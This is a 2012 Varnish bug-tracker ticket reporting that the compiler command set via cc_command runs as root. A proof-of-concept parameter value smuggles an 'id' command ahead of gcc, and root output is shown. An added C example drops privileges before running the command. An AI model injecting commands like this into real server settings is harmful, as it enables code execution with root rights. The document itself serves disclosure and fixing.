[Varnish] #1153: No privilege separation for cc-command
Varnish
varnish-bugs at varnish-cache.org
Tue Jun 12 10:09:58 CEST 2012
#1153: No privilege separation for cc-command
----------------------+-----------------------------------------------------
 Reporter:  kristian  |       Owner:
     Type:  defect    |      Status:  new
 Priority:  normal    |   Milestone:
Component:  varnishd  |     Version:  3.0.2
 Severity:  normal    |    Keywords:
----------------------+-----------------------------------------------------
In short:
{{{
param.set cc_command "id >> /tmp/bad_guy_was_here; exec gcc -std=gnu99 -g -O2 -pthread -fpic -shared -Wl,-x -o %o %s "
}}}
leads to:
{{{
root@vac-agent:/etc# cat /tmp/bad_guy_was_here
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
}}}
The issue being that it's run as root, not that it works.
Not confirmed on master yet.
--
Ticket URL: <https://www.varnish-cache.org/trac/ticket/1153>
Varnish <https://varnish-cache.org/>
The Varnish HTTP Accelerator
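
One way to get the separation the ticket asks for, as an added example (not Varnish's code and not part of the original report): fork a child that irreversibly drops root before handing the compiler command to the shell, and refuse to run the command if the drop fails. The function names, the exit code 125 and the 65534 "nobody" uid/gid are assumptions made for the example.

```c
#define _DEFAULT_SOURCE
#include <grp.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>
#define UNPRIV_ID 65534 /* assumption: uid and gid of "nobody" */
/* Irreversibly drop root: groups and gid first, uid last. 0 on success, -1 on failure. */
static int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() != 0)
        return 0; /* already unprivileged, nothing to drop */
    if (setgroups(1, &gid) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    return (setuid(0) == 0 || geteuid() == 0) ? -1 : 0; /* root must be gone */
}

/* Run cmd via /bin/sh in a child that dropped root first. Its stdout, truncated
 * to fit, is copied to out. Returns the exit status; 125 means the drop failed. */
int run_unprivileged(const char *cmd, char *out, size_t outlen)
{
    int fds[2], status;
    size_t len = 0;
    ssize_t n;
    pid_t pid;
    if (outlen == 0 || pipe(fds) != 0 || (pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges(UNPRIV_ID, UNPRIV_ID) != 0)
            _exit(125); /* fail closed: never exec the command as root */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]);
        close(fds[1]);
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    close(fds[1]);
    while (len < outlen - 1 && (n = read(fds[0], out + len, outlen - 1 - len)) > 0)
        len += (size_t)n;
    close(fds[0]);
    out[len] = '\0';
    return (waitpid(pid, &status, 0) == pid && WIFEXITED(status)) ? WEXITSTATUS(status) : -1;
}
int main(void)
{
    char uid[32];
    int rc = run_unprivileged("id -u", uid, sizeof uid);
    printf("exit=%d uid=%s", rc, uid);
    return rc;
}
```

Started as root, the `id` probe from the report would print the unprivileged uid instead of 0; started as a normal user, it prints that user's uid unchanged.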